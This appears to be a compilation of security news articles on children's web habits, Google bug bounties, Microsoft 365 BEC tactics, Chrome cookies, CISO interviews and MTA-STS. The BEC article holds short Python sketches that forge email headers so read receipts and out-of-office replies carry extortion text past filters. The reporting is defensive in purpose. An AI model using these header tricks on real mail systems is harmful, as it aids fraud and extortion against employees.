Web filtering in Kaspersky Safe Kids currently covers the following categories:

Online communication (social networks, messengers, chats, forums)
Adult content
Alcohol, tobacco, narcotics
Violence
Weapons, explosives, pyrotechnics
Profanity
Gambling, lotteries, sweepstakes
Video games
Electronic commerce (shops, banks, payment systems)
Software, audio, video
Recruitment
Religions, religious associations
News media
Anonymous access tools
Search query filtering
Children’s search activities best illustrate their interests. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

We took the Top 1000 search queries collected from the above search engines plus YouTube as the 100% value, and separately calculated a Top 1000 for the video platform alone. The ranking was based on the number of times a query was entered, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.
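Put another way, a topic's popularity is simply its slice of the Top 1000. A minimal sketch of that calculation, using made-up query-to-category assignments:

```python
from collections import Counter

# Hypothetical (query, category) pairs standing in for the real Top 1000 list.
top_queries = [
    ("youtube", "YouTube"),
    ("roblox", "Games"),
    ("among us", "Games"),
    ("google translate", "Translate"),
]

def topic_shares(queries):
    counts = Counter(category for _, category in queries)
    total = sum(counts.values())
    return {topic: round(100 * n / total, 2) for topic, n in counts.items()}

print(topic_shares(top_queries))  # {'YouTube': 25.0, 'Games': 50.0, 'Translate': 25.0}
```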

We divided the search queries collected from December 20, 2020 to January 10, 2021 into thematic categories:

YouTube
Games
Translate
Communication
Music
Video platforms
Education
Shopping
Anime
Cartoons
Other topics
Because YouTube queries account for nearly 50% of the total, they merit a separate category.

What sites were kids interested in?

Distribution of categories of visited sites, December 20, 2020 — January 10, 2021

Most often, children visited websites with video and audio content (40.36%). This is 2.58 p.p. more than the average for the year (June 2019 — May 2020), while the share of the category amounted to 39.11%. In second place was Online communication (25.8%). The share of visits to the web versions of WhatsApp and Telegram, Facebook, Instagram and other sites in this category also increased against the average indicator for the year (24.16%). Third place went to Video games (16.19%), interest in which also grew slightly: data for the period June 2019 — May 2020 showed 15.98%. But the number of visits to online stores turned out lower than the yearly average: 10.94% versus 11.25% in 2019–2020.

What did kids look for during the winter break?

Distribution of Top 1000 search queries by topic, December 20, 2020 — January 10, 2021

Kids’ search activity shines a light on their interests and largely correlates with the stats on website hits. The highest number of searches in the Top 1000 during the winter break mentioned YouTube (20.84%). In second place in terms of popularity were gaming-related queries (15.47%). Kids also often searched for online translation resources (11.02%). The most popular English-language query on this topic was “google translate”.

Software, audio, video
Despite many overlapping interests, kids from one region sometimes showed a greater preference for certain content than their peers elsewhere. In particular, children from South Asia (Bangladesh, India) showed the most interest in audio and video content (52.84%). In the CIS, meanwhile, the share of such content was only 39.2%.

Share of visits to websites in the Software, audio, video category by region, December 20, 2020 — January 10, 2021

YouTube is currently one of the most popular sites; it was there that children spent most of their time during the festive holidays. This is backed up by the data on kids’ search queries: 46% of all Top 1000 queries in the reporting period happened on YouTube; and the most popular search engine query worldwide was “youtube”.

Distribution of Top 1000 search queries by source, December 20, 2020 — January 10, 2021

We decided to see what exactly kids look for inside YouTube itself. To do so, we collected the Top 1000 search queries by children on this platform from December 20, 2020 to January 10, 2021.

Distribution of Top 1000 kids’ search queries on YouTube by topic, December 20, 2020 — January 10, 2021

Most often, children searched for gaming content (37%). In second place are searches for bloggers or channels of a general nature (20.94%). The typical blogger followed by kids usually posts videos related to one or more of the following: challenges, unboxing, DIY, lifestyle, streams of popular games; plus a mandatory music clip. Such bloggers accounted for no less than a fifth of the search queries in our Top 1000.

The third most common YouTube search topic, as expected, is music (17.13%), the most sought-after artists being the Korean pop groups BLACKPINK and BTS, alongside Ariana Grande, Billie Eilish and Travis Scott. The most popular songs were “Baby Shark”, “Dance Monkey” and “Savage Love” (a dance on TikTok with 24 million views).

But YouTube wasn’t the only platform of interest to children. In the Video platforms category (7.59%), children searched for “netflix”, “disney plus”, “amazon prime” and (Russian-speaking kids) “yandex ether”.

The most popular TV series over the festive period, judging by the number of queries, was The Mandalorian.

Video games
The Video games category ranks third by number of website visits by children worldwide. Kids in Asia were the most likely to visit gaming sites (25.10%). But those in South Asia, as we saw above, prefer video and audio content over games, which accounted for just 5.21% of their visits.

Share of visits to websites in the Video games category by region, December 20, 2020 — January 10, 2021

Among the search queries, gaming is the second most popular topic after queries related to YouTube. The three most popular queries in the reporting period were “roblox”, “among us” and “minecraft”.

Moreover, most kids’ searches on YouTube were for channels of streamers who play live games and bloggers who specialize in Minecraft.

Shares of grouped search queries in the Top 1000 queries on the topic of video games on YouTube, December 20, 2020 — January 10, 2021

The most popular gaming blogger among English speakers for many years now has been PewDiePie, and among Russian speakers Pozzi. The most popular kids’ games, judging by YouTube search activity, are Among Us, Minecraft, Brawl Stars and Gacha Life. The last of these lets players create video stories to watch on YouTube, which kids simply love.

As we predicted in the runup to the festive period, kids couldn’t get enough of the Nintendo Switch game console. During the winter break, kids searched for “nintendo switch” and “nintendo switch lite” more often than “ps5”. One of the biggest-hit Nintendo Switch games was Just Dance.

Interests worth a special mention
In some regions, winter break starts earlier or later than in others, which is why education (5.34%) was still a popular search topic. English-speaking children, for example, most often searched for “google classroom”.

During the holidays, children took an interest in DIY instruction videos. The most popular YouTube channels on this topic are 5-Minute Crafts (70 million+ subscribers), Troom Troom (21.7 million) and 123 GO! (around 10 million). Accordingly, the most popular DIY-themed searches among kids were “5 minute crafts”, “troom troom” and “123 go”.

5-Minute Crafts channel on YouTube

Besides musicians and bloggers, the personalities that children inquired about most during the winter break were Donald Trump (searched for more than any other famous figure), Emma Watson and Elon Musk.

Despite ASMR videos having been around forever (almost), we observed that kids have become more interested in them lately. Among the frequent searches were “asmr” and “asmr eating”.

This winter was not without challenges (in every sense of the word). As for the online variety, Try Not To Laugh was the most popular during the holiday period. Children searched for it not only in English, but also, for example, in German “versuche nicht zu lachen”.

If you think kids had no time for TikTok, think again. In addition to the general queries “tiktok” and “tik tok”, they searched for “tik tok mashup”, “how to change restricted mode on tiktok”.

Conclusion
Despite the absence of Christmas fairs and New Year parties, children still found plenty of entertainment, and not only of the consumerist kind. Going by the popularity of DIY videos, kids enjoy tinkering and making things manually, while their passion for Gacha Life reveals a desire to tell and screen their own stories. TikTok inspires them to get off the couch and shoot all kinds of videos, not just silly ones. K-pop makes it impossible to sit still, and kids love learning dance moves from music clips and special dance videos. Contrary to the stereotype, video games can also help kids stay physically active: the Nintendo Switch, for example, offers the smash-hit Just Dance, which teaches dance moves, as well as the fitness games Ring Fit Adventure and Fitness Boxing 2: Rhythm & Exercise, released in early December 2020.

Modern technologies are deeply integrated into all our lives, and especially for children who have no recollection of a world without video games, YouTube and messengers at their beck and call. And that’s no bad thing, because today’s kids know how to diversify their leisure time without leaving home. We adults would do well to take a leaf from their virtual book.


Google Paid Out $6.7 Million in Bug Bounty Rewards in 2020
6.2.2021 
Security  Securityweek

Google this week said it paid out more than $6.7 million in rewards as part of its bug bounty programs in 2020.

The total amount of bug bounty rewards increased only slightly compared to 2019, when the Internet search giant paid just over $6.5 million. Running for ten years, the company’s programs have resulted in approximately $28 million in reward payouts to date.

A total of 662 researchers from 62 countries received bug bounty payouts last year, with the highest single reward being $132,500.

Google has Vulnerability Reward Programs (VRPs) in place for multiple products, including the Chrome browser, the Android operating system, and the Google Play Store.

Last year, Google paid out $1.74 million in rewards as part of the Android VRP. A total of 13 working exploit submissions were received in 2020, resulting in $1 million in exploit reward payouts. The Internet giant announced higher exploit payouts in November 2019.

According to the company, 30% of the total number of Android exploits ever reported as part of the bug bounty programs were submitted by Guang Gong (@oldfresher) and the team of researchers at the 360 Alpha Lab at Chinese cybersecurity firm Qihoo 360.

The most recent of the 8 exploits they discovered is a 1-click remote root exploit in Android, Google says, adding that the team still holds the top Android payout ($161,337) for an exploit submitted in 2019.

At $400,000, the top all-time spot in Android exploit payouts is held by a researcher who recently submitted two new exploits.

In 2020, the Internet search company also paid $50,000 in rewards for flaws in Android 11 developer preview and launched bounty programs for Android Auto OS, Android chipsets, and for writing fuzzers for Android code.

Following an increase in rewards for Chrome vulnerabilities, Google paid out 83% more than in 2019 as part of the Chrome VRP, for a total of $2.1 million across 300 bugs.

The percentage of V8 bugs dropped from 14% in 2019 to only 6% in 2020, but the number is expected to increase, as Google is offering bonuses for clearly exploitable V8 flaws.

With its criteria expanded to include apps that use the Exposure Notification API or engage in contact tracing, the Google Play Security Rewards Program also saw its maximum bounty for qualifying vulnerabilities increase to $20,000.

Google paid more than $270,000 to the Android researchers who submitted reports as part of the Google Play Security Rewards Program and Developer Data Protection Reward Program in 2020.

In 2020, Google received twice as many reports through the Abuse program, compared to 2019, which resulted in more than 100 issues across roughly 60 different products being patched.

Last year, the Internet search giant also awarded more than $400,000 in grants to over 180 security researchers. The researchers submitted more than 200 reports and helped identify over 100 vulnerabilities.

Google also said it gave $280,000 to charity last year.


Microsoft 365 Becomes Haven for BEC Innovation
30.1.2021 
Security  Threatpost

Two new phishing tactics use the platform’s automated responses to evade email filters.

Two fresh business email compromise (BEC) tactics have emerged onto the phishing scene, involving the manipulation of Microsoft 365 automated email responses in order to evade email security filters.

In one case, scammers are targeting victims by redirecting legitimate out-of-office (OOO) replies from an employee to them; and in the other, read receipts are being manipulated. Both styles were seen being used in the wild in the U.S. in December, when auto-responders were more prevalent due to holiday vacation.

“These tactics indicate attackers are using every available tool and loophole to their advantage in the hopes of a successful BEC attempt,” said Roman Tobe, researcher with Abnormal Security, in a posting this week.

Return to Sender: Read Receipts
In the read-receipts attack, a scammer creates an extortion email, and manipulates the “Disposition-Notification-To” email header to generate a read-receipt notification from Microsoft 365 to the recipient.

The malicious email itself may be trapped by email security solutions, but the read receipt is sent to the target anyway. It includes the text of the original email, and will be able to bypass traditional security solutions and land in the employee’s inbox, since it’s generated from the internal system.

An example:
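A minimal sketch of the header manipulation at the heart of the technique, using Python's standard email library; the addresses and message text are hypothetical placeholders:

```python
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "scammer@attacker.example"          # hypothetical sender
msg["To"] = "employee@victim-company.example"     # intended target
msg["Subject"] = "Final notice"
# Requesting a message disposition notification (RFC 8098). In the campaign
# described above, the notification quotes the original message and is
# generated internally, so it can reach the target even if this email
# itself is quarantined.
msg["Disposition-Notification-To"] = "employee@victim-company.example"
msg.set_content("Extortion text would go here.")

print(msg.as_string())
```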

“Fear-based attacks such as these are designed to elicit an urgent response from recipients to click on a malicious link, and the attackers double down on this tactic by manipulating the email headers with fear-based language,” Austin Merritt, cyber-threat intelligence analyst at Digital Shadows, told Threatpost. “If a user clicks on a link, the compromise of their device could allow an attacker to escalate privileges across an organization’s network.”

Out-of-Office Attack
In the OOO attack, a cybercriminal creates a BEC email that impersonates someone inside the organization. The attacker can manipulate the “Reply-To” email header so that if the target has an OOO message turned on, that OOO notification (which includes the original text) will be directed to another individual within the organization.

“So, the email may be sent to one employee (let’s call them John), but the “Reply-to” header contains another employee’s email address (let’s call them Tina),” explained Graham Cluley, researcher at BitDefender, in an analysis of the findings. “John has his out-of-office reply enabled, so when he receives the fraudulent email an automatic reply is generated. However, the out-of-office reply is not sent back to the true sender, but to Tina instead – and includes the extortion text.”
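The out-of-office variant is the same idea applied to a different header. A minimal sketch, again with hypothetical addresses standing in for John and Tina:

```python
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "spoofed-exec@victim-company.example"  # impersonated insider
msg["To"] = "john@victim-company.example"            # John has OOO enabled
msg["Subject"] = "Urgent request"
# John's auto-reply, which quotes this message, is routed to Tina
# instead of back to the real sender.
msg["Reply-To"] = "tina@victim-company.example"
msg.set_content("Extortion text would go here.")

print(msg.as_string())
```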

As with the read-receipt gambit, the message likely won’t be caught by email-security systems, because it originates from the original target’s account rather than someone external.

“This campaign demonstrates BEC actors’ ability to bypass security solutions and give email recipients the false impression that their account has been compromised,” said Merritt. “This is problematic for network defenders that already have traditional security solutions implemented because the phishing emails either trigger read receipt notifications or redirect to a separate recipient’s inbox, grabbing the attention of the intended victim.”

BEC: A Still-Serious Email Threat
BEC emails are designed to scam companies out of money. This is usually carried out by impersonating an employee, supplier or customer in an email or mobile message. The tactic usually involves asking for a bogus invoice to be paid; or for a recurring payment or wire transfer to be sent to a new, attacker-controlled destination.

The volume of BEC attacks has continued to grow, rising by 15 percent quarter-over-quarter in Q3 of 2020, according to Abnormal Security’s Quarterly BEC Report [PDF]. The average weekly volume of BEC attacks in the time period increased in six out of eight industries, with the biggest rise observed in the energy/infrastructure sector, at 93 percent. The industries with the highest number of weekly BEC attacks were retail/consumer goods and manufacturing, and technology.

Campaigns geared towards invoice and payment fraud were particularly virulent, growing 155 percent quarter-over-quarter, the study found.

The traditional defense for these kinds of attacks – user awareness and training to independently verify that a request is legitimate – becomes more difficult with a distributed footprint, researchers noted.

“Remote work has created more opportunity to execute BEC and other phishing attacks,” Hank Schless, senior manager of security solutions at Lookout, told Threatpost. “Without being able to walk over to another person’s desk in the office, employees will have a much harder time validating unknown texts or emails. Threat actors have taken note of these issues and are using remote work to their advantage to execute bigger BEC attacks.”

Also, as email-security systems get smarter, so are the cybercriminals. For instance, earlier in January a campaign was spotted that leverages Google’s Forms survey tool to prompt an ongoing dialogue between the email recipient and the attacker – setting them up as a victim for a future BEC trap, researchers said.

And Microsoft’s Office 365 in particular, which is the computing giant’s cloud-based Office suite, is an especially attractive avenue for BEC efforts, analysts have observed.

Microsoft and Office 365: A Ripe Target
“While Office 365 provides the distributed workforce with a primary domain to conduct business, it also creates a central repository of data and information that’s a prime target for attackers to exploit,” Chris Morales, head of security analytics at Vectra, told Threatpost. “Rather than leveraging malware, attackers are using the existing tools and capabilities already present in Office 365, living off the land to stay hidden for months.”

After attackers gain a foothold in an Office 365 environment, it’s easy for BEC scammers to leverage a trusted communication channel (i.e. sending an illegitimate email from the CEO’s official account, used to socially engineer employees, customers or partners). But there are several common bad outcomes, beyond mounting BEC attacks, he added.

These include the ability to search through emails, chat histories and files looking for passwords or other interesting data; setting up forwarding rules to obtain access to a steady stream of email without needing to sign in again; planting malware or malicious links in documents that many people trust and use, again manipulating trust to circumvent prevention controls that may trigger warnings; and stealing or holding files and data for ransom.

“The importance of keeping a watchful eye on the misuse of user access cannot be overstated given its prevalence in real-world attacks,” Morales said. “In the current cybersecurity landscape, security measures like multi-factor authentication (MFA) are no longer enough to deter attackers. SaaS platforms like Office 365 are a safe haven for attacker lateral movement, making it paramount to focus on user access to accounts and services. When security teams have solid information and expectations about SaaS platforms such as Office 365, malicious behaviors and privilege abuse are much easier to quickly identify and mitigate.”


For Microsoft, Security is a $10 Billion Business

29.1.2021  Security  Securityweek

NEWS ANALYSIS: Microsoft generated a whopping $10 billion in security-related revenues in just the last 12 months and is now positioned as an enterprise cybersecurity powerhouse.

Microsoft’s decades-long transformation from an embarrassment to a legitimate powerhouse in cybersecurity is showing significant financial returns: more than $10 billion in security-related revenues in just the last 12 months.

The $10 billion figure, deliberately broken out during Microsoft CEO Satya Nadella’s last earnings call (transcript), comes from what Redmond describes as “advanced security and compliance offerings” sold to hundreds of thousands of corporate customers.

The products and services sold include Microsoft’s Azure Active Directory, Intune, Microsoft Defender for Endpoint, Office 365, Microsoft Cloud App Security, Microsoft Information and Governance, Azure Sentinel, Azure Monitoring, and Azure Information Protection.

Nadella was downright boastful about the company’s performance -- and ambition -- in the lucrative cybersecurity business. “This [$10 billion-a-year] milestone is a testament to the deep trust organizations place in us and we will continue to invest in new capabilities across all our products and services to protect our customers,” Nadella said.

For business analysts and industry watchers, the windfall is final confirmation that Microsoft has figured out its place as a prominent security vendor after multiple hits-and-misses over the years.

“Ten billion dollars in revenue with 400,000 customers cements the vendor as a cybersecurity behemoth, without a doubt,” Forrester analysts Jeff Pollard and Joseph Blankenship wrote in a research note.

“As more and more businesses move to cloud, the idea of rationalizing the number of vendors they work with and simplifying security continues to appeal to CISOs, CIOs, and CFOs alike. Fears of “lock in” are disregarded in favor of “good enough” and “integrated.”

“With offerings spanning everything from the operating system to the cloud -- and everything in between, it seems -- Microsoft has achieved its goal of being a mega-security vendor,” the Forrester analysts said.

The results are also an ominous sign for startups and entrepreneurs selling security bolt-ons atop Microsoft’s OS and cloud offerings. “This makes [Microsoft] an existential threat for many companies, especially if they compete in the security analytics, endpoint, identity, and email security markets,” Pollard and Blankenship wrote.

For many years, Microsoft struggled to figure out its place in the anti-malware market, investing heavily in a range of consumer paid suites (remember Windows Live OneCare?) before settling on the strategy of bundling Windows Defender into the operating system and cloud services.

The company also doubled down on its investments in security and risk management and found instant success with Microsoft Azure Sentinel, a product that falls neatly within the security information and event management (SIEM) and security orchestration, automation and response (SOAR) categories.

“What we have built is very helpful in times of crisis and there is a big crisis right now,” Nadella said in a Yahoo Finance interview. “But you need to sort of obviously build all of this over a period of years if not decades and then sustain it through not just product innovation, but also I would say, practice every day.”

As businesses speed up digital transformation plans, Microsoft now sits in an enviable position of being able to sell hybrid and cloud offerings and then sell “advanced security and compliance offerings” to those enterprise licensees.

With hundreds of millions of Windows users globally generating data and telemetry to beef up its security capabilities, Microsoft is set up to cash in even more. The company processes 30 billion+ authentications daily across Azure AD’s 425 million users and boasts that it analyzes upwards of eight trillion security signals across its platforms and services.


Google Says Chrome Cookie Replacement Plan Making Progress
27.1.2021 
Security  Securityweek

Google says it’s making progress on plans to revamp Chrome user tracking technology aimed at improving privacy even as it faces challenges from regulators and officials.

The company gave an update Monday on its work to remove from its Chrome browser so-called third-party cookies, which are used by a website’s advertisers or partners and can be used to track a user’s internet browsing habits.

Third-party cookies have been a longtime source of privacy concerns, and Google said a year ago that it would do away with them, in an announcement that shook up the online advertising industry.

The changes will affect Chrome, the world’s dominant web browser, as well as other browsers based on Google’s Chromium technology such as Microsoft’s Edge. Rival browsers Safari and Mozilla Firefox have already removed third-party cookies by default but Google is taking a more gradual approach.

In a blog post, Google’s group product manager for user trust and privacy, Chetna Bindra, sought to ease fears about the project, saying the proposals will “help publishers and advertisers succeed while also protecting people’s privacy as they move across the web.”

Google said it was releasing new data on one proposed technology, which does away with “individual identifiers” and instead groups users into large demographic flocks.

The technique hides individual users in the online crowd and keeps a person’s web history private on a device’s browser. Test results showed it can be an effective replacement for third-party cookies, and advertisers can expect to see “at least 95% of the conversions per dollar spent when compared to cookie-based advertising,” Bindra said.

Conversions are actions users take when they see an ad, such as clicking to make a purchase or watch a video. Advertisers will be able to test out the system for themselves in the coming months.

Marketers for an Open Web, a U.K. industry lobbying group, said Google’s announcement did nothing to ease concerns voiced by the ad industry and regulators and questioned whether the company’s data showed what it claimed.

Google’s plan has drawn scrutiny from Britain’s competition watchdog, which this month opened an investigation into whether it could undermine online ad competition and entrench Google’s dominant position in the digital advertising industry.

U.S. officials are also challenging Google’s behavior. A group of states filed a lawsuit against the company last month accusing it of “anti-competitive conduct” in the online ad industry.


CISO Conversations: Intel, Cisco Security Chiefs Discuss the Making of a Great CISO
27.1.2021 
Security  Securityweek

CISO Interviews: Intel's Brent Conran and Cisco's Chris Leach

In this installment of SecurityWeek’s CISO Conversations series, we talk to two veteran security leaders in the technology sector: Brent Conran, CISO at Intel Corp., and Chris Leach, Senior CISO Advisor at Cisco Systems. The purpose, as always in this series, is to understand what makes a successful modern CISO.

Organizational hierarchy

The enduring question for many CISOs is where their role fits best in the organizational hierarchy. It’s an important question. Reporting to the CIO or CEO can be problematic because they have different priorities. Reporting to the CFO, Legal or Audit can be problematic because they don’t usually understand the nitty gritty, down-in-the-weeds function of cybersecurity.

Nearly every CISO has a personal view on the question, usually with some slight variation from others, depending on their own experiences. Brent Conran from Intel has a dramatically different view from most. “Well, I work for myself,” he said. He doesn’t mean it in the normal legal sense. He means it in the psycho-emotional sense. “Once you’ve got that part of the equation figured out – that you’re a going concern in your own right – where you report to doesn’t much matter.”

But he admits it’s a vexed question. He’s been attending the RSAC Executive Security Action Forum each year for the last ten years. “They’ve asked that question every year. Ten years ago, 95% of CISOs reported to the CIO. Today, it’s probably about 55%, with the rest reporting to a range of offices.”

He thinks the solution depends upon a range of factors: the industry you’re in, what you want to achieve as a CISO, the relationships you have. “If you have a good relationship with the CIO, there’s often a lot of benefit in reporting to the CIO. But if you need a lot of independence to do what’s necessary as a CISO, then maybe you shouldn’t report to the CIO.”

Cisco’s Chris Leach is in broad agreement. “When I first started as a CISO, some 20 years ago, I reported to the CIO – and that made sense. But as the CISO role and accountability have evolved, so the reporting structure needs to change as well. Whoever controls the security budget controls the security – and the CIO has different priorities.” CIOs want smooth computing; CISOs want secure computing – and the two concepts are not always fully compatible.

But that leaves a problem, because other officers tend not to have a close understanding of security. “The best reporting relationship I’ve had has been with a COO. The worst was with a CFO – I don’t think CFOs really understand the issues. But in both cases, it was ultimately down to the personal relationships. I don’t think there’s an ideal place until you understand the individuals and the company concerned. But I can tell you this,” he added: “you should never report solely to a CIO. Maybe dual-reporting with somebody else.”

All of this raises some interesting questions: what can a CISO who wants to shine do if the reporting structure prevents it? Well, this is where Conran’s initial comment comes into play. By ‘working for yourself’, he effectively means it is your life and your career, so take responsibility for it.

“A CISO has to be able to effect change,” he said, “and if you’re in a position where you cannot effect change, do something.” He gave a hypothetical example: “If you report to the CFO and it isn’t working, there have to be other C-suite officers you can talk to.”

Leach takes a very similar view. “If you’re not getting through to the company and you’re having a reporting issue, I would talk to internal audit.” If the problem is reporting to the CIO, Leach doesn’t suggest bypassing the CIO and taking the complaint straight to the board, or even trying to exclude the CIO.

“But I would begin with audit,” he said. “Get their view and see if they’ve had any discussions around this topic with the audit committee and/or the board. Audit understands conflicts of interest. As CISOs, we tend to beat up audit, but audit can be your best friend as well.”

The second question raised by the reporting structure is ‘compliance’. Compliance cannot be ignored. It’s either the law (like CCPA and GDPR) or club rules that must be obeyed (like PCI). The main issues, however, are where should compliance live within the company, and who should own it.

Compliance

“There’s nothing wrong with requiring compliance with standards per se,” said Leach. “The problem is that there are so many of them. Any single company will likely need to comply with multiple different state privacy regulations, multiple international privacy regulations, national and international finance regulations, PCI and more. There is no single audit that confirms compliance with all of them – and maintaining separate and consistent compliance is a burden.”

But compliance is also a problem for the organizational structure of the company. “Take GDPR,” he said. “My argument is that privacy is a component of security. But we’re seeing a divergence of privacy and security with privacy going to the legal department. But the lawyers don’t do operations – they don’t understand 24/7 tickets and all those sorts of things we deal with.” So, privacy is taken away from security, but comes back to security to be handled.

“I’ve seen some companies that have a whole separate compliance department,” he continued. “That department does what it has to do, that’s good – but they always have to come back to security for answers or to make any necessary changes. Security is always central to the functioning of compliance. So should compliance be under security and help security, or should it be on the same level and make demands on security? I don’t know the answer to that.”

Advice

Further insight into what Conran means by taking responsibility for your career comes from both the best advice he has ever received, and the advice he would give to new or prospective CISOs. The best advice came from his father. “Always work yourself out of a job, and you will always have a job.”

He has applied this in different ways at different times. He always looks for people who are constantly seeking to improve their position. He mentors and prepares them. “So, there’s one, two, or three people always ready to take my job - if necessary. But that means that if something bigger or better comes along for me, I can just take it without worrying about my current company. Or if my world suddenly changes, like mainframes get dropped and we move to client/server, or office working gets dropped in favor of remote working, I’ve already worked myself and the company into a position of being able to handle it. Work yourself out of a job, and you’ll always be in one.”

Leach’s best advice is different, but still related to taking responsibility. “The best advice I ever had was simple: never be afraid to vote with your feet.” He expanded on this. “If, as a CISO, you continually raise a hand to escalate issues – and assuming the reporting is to a CIO who has different priorities and ignores you – what can you do? If there is a subsequent breach, it is the CISO who bears the mark of that breach on his CV, forever. What can you do? For me, if I can’t get anything done, or I’m having roadblocks because of a bad reporting relationship, I would leave. And incidentally, I did leave... I did leave one company where I worked for that very reason – because I couldn’t get anything done because the CIO blocked everything I did.”

The advice that Conran would give to newcomers is again related to his central theme of taking responsibility. “What I tell everyone,” he said, “is that you must continuously and constantly learn – and if you do that, you’ll be successful. I get a lot of people who come to me and say, ‘I’m top of class with 99% right.’ I tell them that means you’re 1% wrong, and it might be that 1% that gets you. If you have the personality and aptitude to continue learning, you’ll thrive. If 99% right is all you want, that’s OK, but we’ll find somewhere else for you.”

Leach would simply recycle the advice he received: don’t be afraid to vote with your feet. It implies more than seems obvious. If the CISO is going to take the blame for a failure, he needs to be given the authority to prevent it. Without that authority, for the sake of your career, it might be better to move on.

Personal attributes

At this point it is worth asking what it takes to be a top CISO. Conran has little doubt. “Agility,” he said, “and the self-confidence to use that agility. Look,” he continued, “we might be doing something one day, and the world suddenly changes under our feet.” Like the pandemic forcing an almost overnight switch from office working to home working. “We have to be able to pivot, and we have to be able to pivot today.”

Or there might be a sudden and major incident. “A CISO must be able to talk at all levels – like from 40,000 feet and 20,000 feet, and sometimes right down to the ones and zeros – while keeping your hat on straight,” he said. “The agility to interact with all levels of that stack simultaneously is imperative to being successful.”

There’s a related attribute: the ability to understand the business. “Security used to have a technical relationship to the business,” he said. “Discussions mostly came down to ‘yes’ and ‘no’ – mostly ‘no’. That doesn’t work anymore. The CISO must be able to sit down with the business in a consultative manner, and say, ‘I understand where you’re trying to go – let me explain the best way to get there.’ ‘No’ must become ‘Yes, but like this’.”

Asked outright whether the CISO needs to be a businessman or a techie, he replied, “I don’t understand the question. I don’t know how a CISO can do his job if he doesn’t understand technology, and I don’t know how he can do his job if he doesn’t understand the business. An understanding of both is part and parcel of being a CISO.”

Leach has a slightly different emphasis. “It’s more important to be a businessman,” he said. “I’ve been saying this for 20 years. If you think about being a CISO, it’s like being a general in a big battle. You’ve only got a certain number of troops and a certain amount of resources. How can that work if you don’t know where it is most important to deploy them?”

He gave the example of a Fortune 50 company. He asked the CIO what the company’s crown jewels were – what most needed to be protected. The answer wasn’t this data, or that server, or some intellectual property – it was the customers. The CEO gave exactly the same answer. “But if I went to Coca Cola and I asked the same question, I might be told their recipe or something like that. All businesses are unique. But if I don’t understand what each business is trying to achieve – what it’s best at – then I don’t know how I do my job. And most CISOs forget to ask the question.”

Conran adds two other attributes that will benefit the modern CISO. The first is a thick skin. “I cannot make a decision,” he said, “that does not upset a portion of my workforce. Whatever I do, I’m either turning something on or turning something off. Whichever it is, it will mean change, and people simply aren’t wired for change – but you’ve just got to keep your mind focused on the goal.”

The second attribute is a desire to learn. “I read for hours in the morning and hours at night – technical whitepapers, industry trends and developing themes. If you move to a new platform or different piece of technology, you must make the time to thoroughly understand it. Security is like a journey where you’ll never reach the destination. The good news is that you’re never going to finish learning about your job. The bad news is that you’re never going to finish learning about your job. You just have to keep up.”

Future threats

With an understanding of what it takes to be a top CISO, it is worth asking where the future threats are likely to originate. Conran breaks it into tactical threats (immediate term), and strategic threats (longer term).

“The tactical answer is ransomware and commodity malware. Ransomware is happening across the globe. It’s destructive and a huge problem, threatening trust in the internet. Security builds confidence in the internet. If people were to lose their confidence and no longer trust their bank or online retail shops, then rebuilding trust is something we’re going to have to work on.”

For the longer term, he has a different concern. “If you look into the future, but not so far out, I think Quantum is going to be massive for this sector – and for the Internet. None of our encryption algorithms will work once we have Quantum. None of our security products will work once we have Quantum. And, whoever finally gets there first is going to throw this industry up in the air. We’ll have to work through that pretty quickly to ensure we maintain the integrity of our data and transactions.”

Summing up, he said, “Tactically, it’s going to be ransomware and commodity malware that’s the problem. More strategically but within the foreseeable future, I think quantum computing is going to be very disruptive to the existing security products and standards that we have today.”

Leach is as much concerned about security’s response to threats as about the precise type of threat faced. “I think the biggest problem is that innovation from the attackers is accelerating, and we are not. We cannot continue to do what we are doing – we have a cycle of a 3- to 5-year plan and strategy. If we don’t shorten this, if we don’t go faster, we are in danger of becoming obsolete as individuals. That’s not the role of the CISO, but the existing crop of CISOs.”

But there is another problem that stems from within, especially in the technology sector. “There’s an overwhelming number of security product vendors out there. Our constant chasing after the latest shiny object really distracts us from just getting the job done. It’s a difficult issue because we all quite rightly look for new emerging technologies, but there are so many of them. I cannot operate a bunch of single-purpose solutions in my organization – I don’t have enough people, I don’t have enough budget, and I don’t have enough time. We need to start looking at the interconnectivity of devices, vendors, and what I really think of as a fabric. We need a better integrated security fabric.”

It’s a question of communication between devices. “Take the SIEM,” he said, “which was supposed to solve so many problems. You add a new process, or whatever, and suddenly, you’re re-baselining all over again. So, my SIEM, which was bought to be a problem solver, becomes a millstone around my neck.” The problem, he suggests, is that the vendors are not working together.

His third concern is that security needs to become more resilient. By this he means more than just recovery – for Leach, resiliency involves the anticipation of problems so that they can be avoided or better recovered from. “Resiliency is more than just recovery,” he said. “When we talk about resiliency, people often think it’s just recovery from backups. But no. We need to anticipate failures. The attacks are becoming better, stronger and more specific. We need to be in a position to anticipate and prepare for what the next attacks are going to be like.”

Between them, Intel’s Brent Conran and Cisco’s Chris Leach have painted a picture of the major threats to expect over the next few years, and best practices on how to handle them.


Enhancing Email Security with MTA-STS and SMTP TLS Reporting
26.1.2021 
Security  Thehackernews
In 1982, when SMTP was first specified, it did not contain any mechanism for providing security at the transport level to secure communications between mail transfer agents.

Later, in 1999, the STARTTLS command was added to SMTP, which in turn supported the encryption of email between servers, providing the ability to upgrade a non-secure connection into a secure one encrypted using the TLS protocol.

However, encryption is optional in SMTP, which means that emails can be sent in plaintext. SMTP MTA Strict Transport Security (MTA-STS) is a relatively new standard that enables mail service providers to enforce Transport Layer Security (TLS) for SMTP connections, and to specify whether sending SMTP servers should refuse to deliver emails to MX hosts that do not offer TLS with a trusted server certificate. It mitigates TLS downgrade attacks and Man-in-the-Middle (MitM) attacks.
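
As a rough illustration (example.com and its mail host are placeholders), a receiving domain advertises MTA-STS with a DNS TXT record and publishes its policy at a well-known HTTPS URL:

_mta-sts.example.com.   IN   TXT   "v=STSv1; id=20210126000000Z"

The policy itself is a small text file served at https://mta-sts.example.com/.well-known/mta-sts.txt, for example:

version: STSv1
mode: enforce
mx: mail.example.com
max_age: 604800

In enforce mode, senders that support MTA-STS must refuse to deliver to any MX host that does not match the policy or cannot present a valid TLS certificate; the id value is changed whenever the policy is updated.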

